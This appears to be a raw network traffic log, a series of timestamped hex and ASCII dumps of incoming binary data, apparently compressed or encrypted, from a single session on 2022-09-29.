                                                                                                                                                            2022-09-29 12:45:20 UTC28604INData Raw: 2a 1d 21 26 a9 30 ed d7 b8 3d 49 d9 05 e6 1b ab 54 44 77 6b a8 40 eb 42 83 6e 56 b2 54 4c c7 4f 6d 4f bb 40 97 14 d6 52 95 a3 ab 7c 01 6c 08 59 4f e4 d0 88 55 1e 6f 44 d1 74 fe 90 32 05 47 a4 ca 14 07 de 1c 02 53 78 d5 89 c4 c7 25 b8 bd 99 51 b2 73 c5 2a 83 c2 07 85 c4 ae ec 89 5f 8f 49 8c e1 0c 46 c2 a0 08 67 8e 5c 80 c0 ed 29 9f 0a ae 67 3a 5f 83 11 23 a2 1a 10 eb cc 51 94 84 5b d4 2b 61 19 00 2b cc 35 a8 40 6e c6 d7 32 b9 5f 83 95 ea 80 cf 87 42 e8 52 b0 c4 99 7f 63 f7 ac 05 04 ce 09 b9 08 6f d6 4c e3 4e 63 aa 97 a5 08 8d 54 48 57 aa 60 5f cd 17 7a f4 ed 76 b3 e0 09 e8 8c 8d 8f 56 fd 9c 32 41 dc f3 37 c4 92 cd 16 02 1e 3d 7f 90 0b 92 6e 67 42 df 41 05 28 3a 22 fe c6 7f e3 62 ad 31 c4 29 39 62 b5 da de 51 9d 9b b1 9f 39 61 98 9a ad 4d cf 22 36 8c 65 10
                                                                                                                                                            Data Ascii: *!&0=ITDwk@BnVTLOmO@R|lYOUoDt2GSx%Qs*_IFg\)g:_#Q[+a+5@n2_BRcoLNcTHW`_zvV2A7=ngBA(:"b1)9bQ9aM"6e
                                                                                                                                                            2022-09-29 12:45:20 UTC28604INData Raw: c1 4b d6 bf ce ef 98 cd 51 3a 06 c2 e2 f8 eb f3 99 a9 fc 4b 48 ad 9e 5c a3 ff 4e 70 66 6d 48 ad 0d 1f 26 f1 b9 e9 1e 1c e9 19 1e cb b7 e8 91 11 e8 c6 2b fb eb 4e 26 52 1a 05 37 fe 40 fc fb b2 c1 78 ea 20 bc 18 5a b2 32 74 e7 be e8 3a e6 8f 33 91 60 5e 37 d0 46 0d ea bb c3 a6 fb 36 0b ad 05 ac 0e 73 63 b2 f1 18 6c 56 6e c4 d6 eb b8 3f dd d0 4a 5a 45 1e 10 fe b6 93 c6 88 ef 3d f4 a8 ca e9 97 3b 29 54 fe a7 27 19 72 6c 7d 50 39 4f 3d 77 08 5a ee bd 38 5c b6 04 5a 6d 11 85 6b a5 2c f5 d2 df 99 c1 90 b4 d9 c6 8c 23 d5 09 92 1f f5 98 b3 a0 90 79 71 a0 57 a9 ca 40 31 d8 8c 22 18 16 27 14 b2 7b a9 2d 27 96 6a 84 53 f8 b3 8e c5 eb bf 08 77 2f 76 66 c2 c5 5d 0a c7 bc fd f0 4a ca be e0 95 7c ab ce 7f 04 a1 78 4a f9 48 52 f8 42 8f ad d5 9c 6f da 5d af c1 90 7f 4b e4
                                                                                                                                                            Data Ascii: KQ:KH\NpfmH&+N&R7@x Z2t:3`^7F6sclVn?JZE=;)T'rl}P9O=wZ8\Zmk,#yqW@1"'{-'jSw/vf]J|xJHRBo]K
                                                                                                                                                            2022-09-29 12:45:20 UTC28620INData Raw: 52 3d ec 92 7a 89 05 de bd d8 8b bc cf ee 5d c9 be d5 32 18 1e dd f3 c8 a3 d1 1e f4 35 9f be 7a a5 78 fc c7 09 8b 44 1a ae 2f fc aa f6 3c 49 5b 2a 42 3c d0 dd c4 71 c9 b7 e9 7f 37 75 2c cf 57 d7 25 02 e7 a5 49 f6 6c 5f ef a2 87 89 74 36 7b 4c 5d da f9 cb 9f 61 b5 37 64 3a 44 89 bf 49 79 ad 87 fc e4 ff a1 bf dd 7a d2 b2 75 bd 4a f5 fe a4 06 31 48 9a af 68 de 17 72 7c 69 ba 5d 8f 83 56 84 60 32 c6 c3 ca ee a1 10 e5 9f f2 ef 9f bc 88 a1 3f d0 9a 73 c6 64 24 0f 58 9d bc 48 c0 33 6c be bf 84 59 e7 f2 66 cb 03 28 0c 52 ca ab de f4 d9 1f 37 d9 c4 8a 51 f2 ff f6 0e 6f a5 4e 46 96 57 e5 36 63 0c 1c 6b b4 a1 d5 77 1a 47 14 81 02 3f 55 44 fd 87 f0 e2 25 8c 95 7b a5 c4 e1 e0 ed 1e 6a 20 dc a9 25 d0 03 a8 98 bb ce 43 88 ef b9 d3 ad 3a 34 78 81 fe 01 89 7a e7 78 e7 bc
                                                                                                                                                            Data Ascii: R=z]25zxD/<I[*B<q7u,W%Il_t6{L]a7d:DIyzuJ1Hhr|i]V`2?sd$XH3lYf(R7QoNFW6ckwG?UD%{j %C:4xzx
                                                                                                                                                            2022-09-29 12:45:20 UTC28636INData Raw: d8 5b a9 48 4f 01 e3 c4 11 1a 92 df df 10 a9 8e 99 a4 e3 5a 6b a2 bc 93 12 ff 2c 80 0e 79 28 ab 22 8d 2f 7a 61 e9 36 26 0e 77 f8 d9 7f f5 88 c0 fb 07 9b ae c7 74 82 a3 3c 73 b4 36 04 b4 0e 7e 26 35 2d 70 e6 a7 72 06 f7 9f 81 92 c8 9c 67 f9 3b 72 d0 62 40 9b e8 0e 84 62 0c 5f 8c 56 fd e2 5b 04 79 d9 a6 61 e9 68 e1 26 6b 26 06 4f d2 73 72 d6 8a d2 d8 a3 b1 91 8c 6e 74 dd fa bd 9a c7 dc 38 eb 47 03 23 56 48 8a 4f 72 77 e4 21 75 4b cd eb 33 ab 5e 30 44 26 f4 bf 61 37 6b d3 94 b4 59 f6 c3 8f 14 90 3e 0b 9e 04 71 0a 7e ca ed a6 ee 34 01 57 19 cd 31 37 86 6d ae da a0 41 a5 e8 2f 2a 7f 83 db ea ff de f7 e4 d2 4d b7 7e ce 11 1e 61 9d b1 3c 2b 62 95 e5 72 64 55 fe 11 3d bb 1f 9f b2 47 c3 7e ac 7d e3 e8 c9 1d a7 0d e1 fb f4 b3 8e d8 02 61 c6 89 63 a4 94 20 49 40 06
                                                                                                                                                            Data Ascii: [HOZk,y("/za6&wt<s6~&5-prg;rb@b_V[yah&k&Osrnt8G#VHOrw!uK3^0D&a7kY>q~4W17mA/*M~a<+brdU=G~}ac I@
                                                                                                                                                            2022-09-29 12:45:20 UTC28652INData Raw: 36 59 ea 83 bf 32 b4 cf dc be 8e 18 32 3b 96 e9 92 b8 c4 1a 31 0f d3 86 fb 24 33 35 bb dd 9f 71 5b 8a c5 e3 6e 1c 60 9e 7a 3d cf b0 7d a6 2c 10 84 cd 62 da a5 7e d4 58 d7 9d 6e 19 6c af ae 7c d1 d0 a9 37 99 93 75 7d bc c5 64 57 7f 98 3c d7 5e 4d 3c 44 c8 66 2d 42 71 f1 df 2b 4e 3b b0 3a de b0 a0 62 71 67 41 f8 90 cc 75 87 59 c3 52 0b 0b 3a 0f 88 c4 77 08 57 d4 83 f5 cf a4 43 f5 b1 53 54 58 94 df 08 9c 75 66 20 ec 10 67 92 36 3c fd 39 cc 41 f6 71 5b 92 ce f8 cc 56 6f b1 16 95 5c 14 d6 d3 41 a8 36 45 b3 e3 9f 0b 53 24 a3 26 21 52 c6 b2 b5 f7 29 cd 21 41 1d a0 35 98 f1 3e 30 f1 01 0e 2d ea 11 ad 1e 53 c1 bb 61 44 72 af 69 b7 27 f1 3b 90 46 76 45 55 7e b6 3c a2 b3 30 40 db c3 85 37 a3 57 18 c1 b7 3d 52 ab c0 05 26 fb bf 4b ae 77 ad f0 e2 7c b7 f3 e5 6b 4e cd
                                                                                                                                                            Data Ascii: 6Y22;1$35q[n`z=},b~Xnl|7u}dW<^M<Df-Bq+N;:bqgAuYR:wWCSTXuf g6<9Aq[Vo\A6ES$&!R)!A5>0-SaDri';FvEU~<0@7W=R&Kw|kN
                                                                                                                                                            2022-09-29 12:45:20 UTC28668INData Raw: 2b a9 61 0a 7e be fe f1 0f 3f 68 9d a7 e0 d3 ac e8 34 55 74 da 2b 1c ec 87 40 21 ba d3 ca 73 ad 47 c6 39 88 27 bc e4 0f 24 1d 2d 7e 35 34 96 73 43 99 7b cf c2 3b f2 f1 9d a0 00 03 1d d2 aa 92 76 1b dc 91 61 d0 5c 25 d2 c3 cc e1 4a a8 75 4f 86 46 24 58 4a 49 ff 7a 81 de f3 36 c5 36 8f a4 c3 ba c6 a0 c0 3e 21 59 6e 39 41 da 1f d4 a1 ed 33 be 7c 8b 16 51 28 58 88 cb 91 20 d3 d5 dc 29 33 ff f4 b7 1f 7c fa b6 01 c6 c3 cd 64 c0 ce 82 fb c6 99 4a b6 f4 74 5d ff 7e 8d cf 5e 5b af 6e bd 61 16 a8 db c0 b6 23 e1 ad 78 26 06 32 43 8f 56 90 fc 40 ea f5 47 ab 4e 13 c4 27 c2 c3 7f 8f 05 08 f5 8b a5 25 ad 7a 9f fd 16 c9 f2 9d 0b 90 f8 61 2f 67 76 6b c5 f3 ae db 7d fe cc f6 1c 28 26 ab b5 85 bd cd 0f b8 5d 4d ca 4e 52 5f a3 fd a7 ed 02 78 50 ba 4b c8 e4 15 08 49 ce 2a 5b
                                                                                                                                                            Data Ascii: +a~?h4Ut+@!sG9'$-~54sC{;va\%JuOF$XJIz66>!Yn9A3|Q(X )3|dJt]~^[na#x&2CV@GN'%za/gvk}(&]MNR_xPKI*[
                                                                                                                                                            2022-09-29 12:45:20 UTC28684INData Raw: 3b bf 40 99 39 40 19 57 40 91 ab 77 f7 7f 1e 3a d9 f7 5f 13 49 dc c6 c2 14 2a 81 a6 ad c8 2e 91 e8 f8 87 00 c7 6b 50 e1 dc 3e b5 a7 4f 43 5b d7 c1 13 a3 de b1 7d 1e 6f 39 22 94 34 05 83 c6 50 47 f8 bb 2d cb cc c8 69 09 c0 14 75 12 35 a1 f6 4d 82 57 27 28 73 eb 01 ad b7 92 f3 90 a8 79 0d f8 0e 5b 4c d1 95 b4 a6 70 6a 69 f4 bf 47 11 54 39 04 96 71 c2 2e f0 6d 48 ed f2 2c 27 e2 9e d8 05 a9 95 a5 ea da 4c be dc 16 dd 37 d1 c3 76 04 66 8f af a5 9e 19 ae 79 cf c5 04 59 4c e3 60 3d a1 17 ec bf 53 cf d6 5c d6 05 02 62 e1 da ee 29 c2 88 35 12 f8 cb 57 fe 1c 6b 04 f7 1c e4 2f 50 f3 42 ae 4d b4 e4 f5 cb de dc 93 e4 ca 8b 43 fc f9 f2 eb e6 8a 27 72 1a 1d 34 fc c7 88 d8 2a e7 df ed 63 39 c9 c8 45 65 33 db a3 4d 7b 71 f0 d8 6c ee bf fc bc eb 71 66 66 f8 a7 b7 02 be d0
                                                                                                                                                            Data Ascii: ;@9@W@w:_I*.kP>OC[}o9"4PG-iu5MW'(sy[LpjiGT9q.mH,'L7vfyYL`=S\b)5Wk/PBMC'r4*c9Ee3M{qlqff
                                                                                                                                                            2022-09-29 12:45:20 UTC28700INData Raw: a9 c8 1a 3f 2c ea fc f7 45 a8 a6 d6 e1 ef 92 37 df 48 4f 16 e2 5b c4 d9 70 be 02 1f 46 4c 10 18 ec 2b 25 26 35 d5 a0 4a a5 f1 74 a4 01 ab c4 f0 6b e4 e5 ce 7d 38 e1 16 a3 d8 fb e8 d6 bd e5 68 fa a6 35 66 3c 0b a4 dd b5 94 db 0b 00 59 64 3d 77 04 3c 74 5b 16 01 69 05 89 82 2b ec 3b bf 35 53 97 87 6a 8a b4 bf ab 7e ac 72 ef d5 a6 51 47 90 7f 38 b0 13 23 05 62 7d cc 7c a9 4e b2 40 f4 9f ad a3 02 f3 5c f8 8a c9 2e 09 10 c9 de e6 73 61 41 ee a1 96 53 d9 14 1e 54 5e 55 fe 8a 3a 27 e1 45 11 3a b9 70 02 07 fb 7b a2 2e b8 5a 77 9d 20 6b 7f b6 70 d4 e5 6e 4c 1a 17 91 3a 94 e2 76 da 52 5d da a0 57 0c e5 6e 82 26 b9 c6 29 5c 96 c2 ba 92 d1 dc 31 af 33 cb 63 7f 04 ed 1f d5 ce a7 91 11 e5 0c d2 d0 8d 15 ad d4 d4 b2 b3 3d cf 84 b1 b5 ab fd c4 c6 b7 28 fc 0a 0d e8 3a db
                                                                                                                                                            Data Ascii: ?,E7HO[pFL+%&5Jtk}8h5f<Yd=w<t[i+;5Sj~rQG8#b}|N@\.saAST^U:'E:p{.Zw kpnL:vR]Wn&)\13c=(:
                                                                                                                                                            2022-09-29 12:45:20 UTC28716INData Raw: 2e 90 f1 d9 68 75 71 ea 29 e8 11 d6 86 50 f4 fd 5d 86 95 e1 9f cf 49 8f e8 cd f3 cb 2b 8b 34 8e 8f 5e cf 20 ac 9c 64 bf 0c b5 2e 7f 2a 85 6b 11 f0 bc 8d 49 ce 19 3c 0e 42 2e 6a 50 da a6 f8 58 59 31 9d 8c 76 ab bd 3b a5 ae 1e 03 2e 96 81 3a 6a 6c 95 18 77 75 41 af 23 39 71 7a 0a 83 c0 0b e2 14 0d 00 7f 04 b7 27 c4 e5 05 79 fc c5 c5 23 8c d3 d9 e2 c1 f5 6e 2b b8 21 de 41 03 5a cc 76 99 0d f9 5d 81 a7 b7 f1 86 82 7e ba b7 ed 91 3e 37 a6 90 75 67 be e8 96 ce b3 25 f3 f9 6c ad b8 82 a1 bc c0 50 20 c5 ca 63 16 a3 80 ad 49 ff 56 53 d0 c3 7a 25 fb 90 a0 cd 9f 7f 31 43 18 1d 07 05 9d 32 77 bb f0 5b 00 14 2c 94 8b ae 13 4e c5 ce e5 5a 0b 3e 6a fe 41 f4 49 24 9c 02 b6 2c 0d 75 a7 c8 15 2a b2 8f ae 3b a8 6e be ec 9d 08 e3 0c 44 a4 23 f1 4e db a3 d4 be 72 59 ee ba fa
                                                                                                                                                            Data Ascii: .huq)P]I+4^ d.*kI<B.jPXY1v;.:jlwuA#9qz'y#n+!AZv]~>7ug%lP cIVSz%1C2w[,NZ>jAI$,u*;nD#NrY
                                                                                                                                                            2022-09-29 12:45:20 UTC28732INData Raw: 93 8f 6f ad 7d 92 eb 60 b5 38 0d c8 b8 6c 39 c4 c3 4b 37 f9 24 05 b5 50 c5 94 23 05 33 2d 80 a7 38 9d d3 ce d7 e6 67 6d 94 b7 b5 05 fe 3b 9d f8 b1 b1 f1 f2 de 5d f7 1f e6 09 f2 a7 d8 db 38 60 d2 1f 45 3d 75 ba 8e 55 f9 41 d7 7a d3 bc ed 19 94 48 85 b0 11 19 8b 68 4a 00 10 38 ec f8 14 1d 59 06 16 8e 4b 4b 4a dd dd b4 9d 11 3f 4d d7 61 c3 2e bc fd ea 0d 3f 0c 46 32 f0 ca 8b 00 b9 6e f5 b4 6f a0 80 47 61 69 b6 e3 2b c7 cb 10 97 bc 33 ae e0 4a fd b1 21 3e 82 9f bb 98 b9 00 58 43 fd 62 59 e0 49 b9 da 3e 2b 5f 32 30 ed 09 66 10 9d 28 17 cc 80 05 c5 18 db 14 71 eb c9 89 7c a5 b0 0a c7 f4 79 7f 09 2b a4 a2 ac b3 45 03 d9 4e 80 c1 72 c4 2c 22 8e 46 51 a8 21 f4 04 33 79 3b 89 07 22 00 ae 55 db 16 f1 9d 89 0f d7 2a 85 c8 3a cf 84 90 3c bc c2 dc a7 06 08 38 f2 61 fb
                                                                                                                                                            Data Ascii: o}`8l9K7$P#3-8gm;]8`E=uUAzHhJ8YKKJ?Ma.?F2noGai+3J!>XCbYI>+_20f(q|y+ENr,"FQ!3y;"U*:<8a
                                                                                                                                                            2022-09-29 12:45:20 UTC28748INData Raw: cd b2 e3 e1 87 b3 0d 24 86 6c 24 0a c7 ee 61 1d bb 53 e2 a3 bf e6 cb 19 5f 28 7c 53 85 ed 0a df 54 a8 b2 a8 57 11 ac ad 46 00 e1 fa f2 88 b4 de 51 a4 ca b3 b8 42 47 16 3c 90 14 56 33 52 70 a9 79 37 a5 79 08 56 89 7c f2 ff c9 24 a7 8f cc b4 02 c5 df 15 10 8e 2d d2 5e ee af 5b bd 5d ca 41 60 e0 b0 9d ca 2c 55 82 64 93 a0 0a ca 26 78 45 a8 92 3f 9b eb 30 de c5 6a 37 79 cb 71 1c 95 69 37 39 b9 54 98 a7 86 2f ae 2c 45 97 e0 44 f6 0b 25 83 18 4b a0 bc 9f 8c ed 04 1a 1a b7 66 26 cc ed 0a d8 dd e7 d4 d2 b2 9b 5b 66 25 d6 f6 61 51 4e ac de db 77 09 18 98 d5 a0 eb 1b b8 fe 46 e0 4e cc 00 bd 9a f5 be 4c d8 6c bc 63 bd 80 18 06 f8 7a 5f 09 66 6f 0f 07 9e a9 29 1b da 54 9c ba b7 de fa 43 62 e8 1c 89 1e 8c df 07 b3 ff e0 ab 8e f4 03 87 c4 2d f5 31 98 0b c0 39 19 e3 9a
                                                                                                                                                            Data Ascii: $l$aS_(|STWFQBG<V3Rpy7yV|$-^[]A`,Ud&xE?0j7yqi79T/,ED%Kf&[f%aQNwFNLlcz_fo)TCb-19
                                                                                                                                                            2022-09-29 12:45:20 UTC28764INData Raw: 1b 98 fc 0a 26 ec a8 86 ab cf 1f cc f9 7e 44 07 d2 0f 97 61 40 cd 50 a5 b1 55 ca f3 ff 4d 8b 64 82 35 dc 8e 91 b1 26 63 2e 03 da d6 a5 54 2a 5b f7 14 79 12 ef 54 50 b3 eb 07 2c bd a5 b5 88 7f 53 34 a7 40 0c d3 f1 bc 38 63 ed d3 c5 e8 d3 dc 7a 8d 5e bd ba f7 af e9 5d 15 96 c4 3d 0e a8 f9 70 ea db bb 6b 4f 48 2a 43 1b d0 ea 83 a9 3d c6 10 ed 1d c6 f0 c0 24 bd e9 5f 8e 02 32 12 e9 ce 3c 7e 78 9a c8 c4 2c 15 ab 80 f2 93 d5 83 9d b3 65 ac 5a 57 f5 a1 ad 72 9b 63 2a 03 ca 77 b5 c3 e2 ff 3c 45 fb d7 55 55 2d 84 dd 2d 48 f4 77 02 97 24 29 05 c3 42 33 f2 79 0c 10 e7 54 1f 5a 7d 64 df 52 b1 cb 0b 43 38 5e fb d7 fa 17 44 1e 92 88 15 5a f8 8f dc 0c e3 81 e2 fb 33 8f fe f2 31 52 46 d2 12 79 5d b2 61 4a 74 f5 67 f6 d7 20 0b f7 6b 4b 86 d8 8c ad 85 4c 24 2a 67 21 d3 4c
                                                                                                                                                            Data Ascii: &~Da@PUMd5&c.T*[yTP,S4@8cz^]=pkOH*C=$_2<~x,eZWrc*w<EUU--Hw$)B3yTZ}dRC8^DZ31RFy]aJtg kKL$*g!L
                                                                                                                                                            2022-09-29 12:45:20 UTC28780INData Raw: c5 bc 17 33 b0 b9 9b f8 f8 56 31 13 dc 1d 05 7c 2f a4 1a 3a 2a 85 2b b4 ca 76 70 dc 8e 3d 7d 5c 71 35 c4 79 90 79 2d f2 cc 54 29 bd 5c f2 13 fc 88 c4 db d6 58 50 95 08 84 2c 9d 86 8c f6 6c 72 6a e4 71 eb 73 d9 13 79 e1 d4 d1 36 48 3b 51 99 59 ce eb 1c 14 81 ff 1c f3 02 5d 41 01 a4 cd 18 7c 2d 46 60 2d 6f b4 3f e1 4d 59 ed 5c 97 d0 7b 3a 60 dd 96 26 a1 cc 53 c7 29 7a 56 25 f8 40 7e c7 14 2a ad 48 30 6b 47 98 da 6f 7f 5e 55 a2 b7 41 bc 75 72 2b 41 83 05 23 56 d4 b7 e8 76 e5 0a 33 fa cf f3 f2 32 d5 d6 d1 65 4a ed 50 f9 9f 68 12 7c 17 95 e8 69 cb f6 6d 1b 7a e8 ca dd 01 40 11 86 55 be 63 fc 2f 84 6a 2b f3 26 d1 d1 61 55 c0 5a fb 03 94 f8 77 06 4c 4f ca ab d8 70 7d d4 01 f9 af c8 c6 9a 66 cb 81 06 a9 bf 4e 10 e3 27 61 e7 86 a7 8d 81 d3 5d 67 3b a6 e5 ec 70 24
                                                                                                                                                            Data Ascii: 3V1|/:*+vp=}\q5yy-T)\XP,lrjqsy6H;QY]A|-F`-o?MY\{:`&S)zV%@~*H0kGo^UAur+A#Vv32eJPh|imz@Uc/j+&aUZwLOp}fN'a]g;p$
                                                                                                                                                            2022-09-29 12:45:20 UTC28796INData Raw: ed ca b7 b4 8b d2 c7 d2 2b 0f 2b 6a 1c 3f ef 9d 11 98 e0 66 53 72 ca 57 8c 78 ab 7c cc 5b ef 96 8f 64 f8 20 b9 53 f1 32 e7 c5 66 3f fd 23 cf e0 a9 88 ac 36 78 1a c0 26 42 30 8b 88 4b 25 1d ef 8e 34 78 6d 89 c9 29 d9 6a d2 40 a6 26 af d7 c4 fb 71 67 03 31 93 af 10 f8 b1 11 28 31 fc 76 3a 88 42 ff 2e b1 74 ec 69 15 21 f0 b0 39 8c bc a3 ad 27 d8 b8 2c 2c d2 60 46 b2 1b b6 0b 19 d8 83 5c 4a 03 eb 86 7e d2 ac 5b b3 4b 9f 25 28 cf 57 67 72 88 b6 74 d5 e8 e8 b2 0c 35 70 10 2b 82 ae 5f c6 69 96 43 8e 54 9b e0 86 a7 e2 29 4f 87 d3 7a a5 2a bf 47 0f 88 51 d4 20 ec 46 29 e9 38 0d f8 d6 5e 9a 0a 30 f8 e6 25 04 d1 fd 50 ac 07 a9 e2 08 8a 96 c5 c3 53 7e ea 4b ef 64 89 96 87 6c 74 de 59 10 29 0b 42 58 b0 4b b2 56 1b b3 bd 51 25 18 e5 e0 7d 73 3b 50 6d b8 58 77 df ec 00
                                                                                                                                                            Data Ascii: ++j?fSrWx|[d S2f?#6x&B0K%4xm)j@&qg1(1v:B.ti!9',,`F\J~[K%(Wgrt5p+_iCT)Oz*GQ F)8^0%PS~KdltY)BXKVQ%}s;PmXw
                                                                                                                                                            2022-09-29 12:45:20 UTC28812INData Raw: 77 9d f6 41 ff 87 5b a9 af 1f 79 b3 5e 65 6c 54 01 16 1c e8 68 df 33 5d 74 49 db 12 ee 52 f1 dd ff 6d 18 e5 b8 8e 54 a5 dc e3 25 2a f0 04 f1 a0 c3 d9 86 4c e3 e9 52 ba 52 37 d7 e7 a8 83 72 76 1b 6e 19 62 43 d8 69 c4 f3 dd ec ec cc 8d 1d 39 fc f5 f4 f3 52 af 3a 1f 7f 57 f6 0a ba 71 16 3e 8f 71 e9 c7 50 65 20 c9 0c 14 98 0e b9 db 6c 69 b4 c0 11 dc be 29 5d fe bc 07 91 bd 2a 83 f2 7b 79 29 d2 16 3c 4f ea b7 9c 13 c9 fd 46 a9 37 41 6d ca 1a 0e f9 96 1d b9 5a b5 e5 f9 f6 b9 06 5d 83 fb 93 84 fc 17 c0 3f 3c 6e fe 3f 5b b2 f2 84 69 f1 cc 0a 56 85 db 33 90 14 58 37 39 2e c7 44 46 48 3a 98 3e b9 e2 70 be 09 86 f8 4f 6e 2d e6 0a c0 ff c0 56 d4 5d 51 b7 6f d7 64 71 ac 48 78 0d 04 ff 19 b6 85 eb 3d 22 c1 e9 3a a0 31 84 92 33 68 cb 9c d7 8c b2 c2 9e 67 66 71 c2 c6 95
                                                                                                                                                            Data Ascii: wA[y^elTh3]tIRmT%*LRR7rvnbCi9R:Wq>qPe li)]*{y)<OF7AmZ]?<n?[iV3X79.DFH:>pOn-V]QodqHx=":13hgfq
                                                                                                                                                            2022-09-29 12:45:20 UTC28828INData Raw: cd 4c 45 2b 9b b9 8a 6d 57 af ca 9f 6c 43 ad 26 b5 78 81 74 a4 24 f4 fd 6b 23 60 ae 3d 05 79 eb 0a ba e2 ea 06 8c d0 ed 38 fa 37 51 9c 50 e3 ae db d4 f4 57 49 fb 52 d5 f4 dd a0 4d 03 ac 61 d2 08 1a d4 ef e7 f4 0d 49 3e 42 47 07 df 3d 14 87 48 7e a4 20 3a 97 a6 0b 43 e5 8f 1e c7 01 e5 55 4b 27 94 a8 2d fc b1 72 0f df 67 8a ef 61 0c 52 e6 ba 18 90 59 c7 cf e7 0d f3 d1 d7 d7 92 57 bd ee 4e e4 c8 31 6d 3d cb 8f 35 4f a2 fb 44 cf c7 6b 3d d0 1a 7c 56 47 f1 a0 36 66 d8 1a 44 8c c6 64 f3 f9 6c dc d0 d7 f6 5b c9 f2 73 9e 50 a1 63 73 7a 69 f0 73 9f 96 d0 ad 6b cc 20 f6 bb f5 c5 4a 6b ec 3d 04 89 a6 e5 7a 5f 81 72 54 81 a8 7c 0c 13 aa 77 42 4d 44 2b 23 2a 84 fa 5e c3 56 31 4e 93 27 70 66 bb de a7 73 ad b6 28 2e 2d 17 ea d0 a4 e6 f2 d4 77 2d 08 e9 c8 23 9c 8d 0f ea
                                                                                                                                                            Data Ascii: LE+mWlC&xt$k#`=y87QPWIRMaI>BG=H~ :CUK'-rgaRYWN1m=5ODk=|VG6fDdl[sPcszisk Jk=z_rT|wBMD+#*^V1N'pfs(.-w-#
                                                                                                                                                            2022-09-29 12:45:20 UTC28844INData Raw: 31 77 e6 d9 19 f6 61 9b 15 a1 6b dd c0 18 e0 8b 86 2f 6b 7e 22 34 da 48 ad 54 44 19 47 f7 e1 c5 7b 6c 57 72 96 2e c9 05 e8 83 46 2e 15 b3 19 fb e8 38 91 8c f0 18 15 55 ab 3b 2c b2 57 86 15 1f 79 c2 b2 b3 11 05 0b f3 1d b5 62 14 ae a6 b1 4f c9 b4 ad b8 1a 4f 4a 32 2e 80 87 12 06 45 73 05 e7 b8 a7 90 f4 06 ac a2 77 de fd a7 41 26 97 2c 35 f3 92 5b 6d 7b 19 6c 5b f4 ee 04 fe f4 24 95 7a 49 c2 93 f3 5c b8 ac af c0 3b 56 9d 0f 3e 72 99 bf fc 9b c3 bb 42 89 3e af 23 80 49 cb e3 ab b0 d3 d3 47 2f 61 7f 30 42 f9 b7 71 42 b9 b8 34 e7 c4 b9 44 44 ad 3e 36 cb 52 8a 3e 09 20 c2 70 e5 48 7b fb 41 70 b0 bf d3 f8 61 5e 75 50 dd c7 0b 0f 41 21 fb fb e3 06 38 8c 3d 21 5d 35 f8 ec aa 94 d1 fa be c4 ce ed 77 db 92 95 20 7f 60 ed 49 3a 1e 80 13 0f b7 e4 99 02 62 5b c1 16 05
                                                                                                                                                            Data Ascii: 1wak/k~"4HTDG{lWr.F.8U;,WybOOJ2.EswA&,5[m{l[$zI\;V>rB>#IG/a0BqB4DD>6R> pH{Apa^uPA!8=!]5w `I:b[
                                                                                                                                                            2022-09-29 12:45:20 UTC28860INData Raw: df 76 7b de d3 9e 38 c7 53 49 e7 b6 4f 6d 92 8e fc c7 b3 f0 b0 c4 79 b6 34 3e 34 a2 0b f8 d9 ce 67 75 12 85 11 f2 46 65 20 3e 46 32 71 41 72 43 b6 c7 64 82 e5 83 ea 8a 05 4e 48 42 9e c5 e2 32 0a 6b 0f 21 f3 62 95 7e 61 57 2d e6 ad 1c 34 c1 38 33 a2 45 51 c4 df 85 a4 15 15 35 15 43 71 c6 c6 cc 70 b6 d9 ef 69 6a 42 e7 8f 73 ab 7c 87 17 f2 a2 b5 61 74 71 fb 4f e8 04 2a 74 83 da 90 1a 46 eb 77 02 18 0f c3 d2 94 3a 5d c5 f2 09 55 d7 94 f4 bd d6 0e 76 b1 ff 85 7d 2d 43 e7 7f 37 10 1b d6 9f 5a 61 e8 b6 f1 07 ec 8d e1 1f aa c1 9c ff fe 69 29 23 4e 42 56 04 d5 39 54 c7 c5 ee e6 83 37 85 0e a7 e6 d9 36 28 b1 ee 98 4a b6 b8 51 26 75 08 27 d5 ce d8 06 36 f8 b7 68 69 f9 58 c4 38 50 b1 3a d3 91 da ad 9b 0a 39 86 6e 64 af 99 ea 0b be 33 2d bf 70 1a b9 2f 45 ac 7b 6b d6
                                                                                                                                                            Data Ascii: v{8SIOmy4>4guFe >F2qArCdNHB2k!b~aW-483EQ5CqpijBs|atqO*tFw:]Uv}-C7Zai)#NBV9T76(JQ&u'6hiX8P:9nd3-p/E{k
                                                                                                                                                            2022-09-29 12:45:20 UTC28876INData Raw: ab 7b 35 b7 fc fb 02 c7 bd b4 b0 3d e1 95 6d 35 5d a6 26 26 37 fa 64 c3 84 3d a6 db 05 1a 69 db 45 d1 00 90 54 28 35 87 37 7a 7d 21 2a cf c2 09 aa 17 dc 6b 40 98 2c f9 6e 4b 50 6d 6e cf de 80 8e d1 44 3a 36 1e 10 cd 93 58 80 e7 65 ea 84 91 f9 05 6b 8a 55 bd 6a 16 09 b0 81 6c 19 ca 39 25 84 cc 70 00 8e 05 4f ae 4b 1c 3a 9e 76 d8 8c 70 6c 60 0a 8d 6e ec 45 df 1e dc 8c c6 37 7e a8 35 fe 8a c1 5a ba f7 44 44 65 5a 26 ae 56 89 58 4a f3 29 86 a1 97 97 02 54 80 09 18 37 5c 7a 0b 75 85 b6 ff f1 15 78 3e 05 b5 ed 54 c3 b8 64 80 58 60 14 4b 5a a7 f7 ca a1 4c 72 c8 47 4e 14 22 ff a7 de 25 18 3c 95 57 49 0f 04 47 53 f6 87 e1 40 ab 8c f5 ea 9f 68 b7 1d f3 e3 ef 40 21 f3 30 ae 6b 4d 04 ef 63 6a ed 03 6e 93 b8 95 07 c5 e3 f6 30 30 8a 5e 5f 35 87 b7 bf bb de ed cd f5 0a
                                                                                                                                                            Data Ascii: {5=m5]&&7d=iET(57z}!*k@,nKPmnD:6XekUjl9%pOK:vpl`nE7~5ZDDeZ&VXJ)T7\zux>TdX`KZLrGN"%<WIGS@h@!0kMcjn00^_5
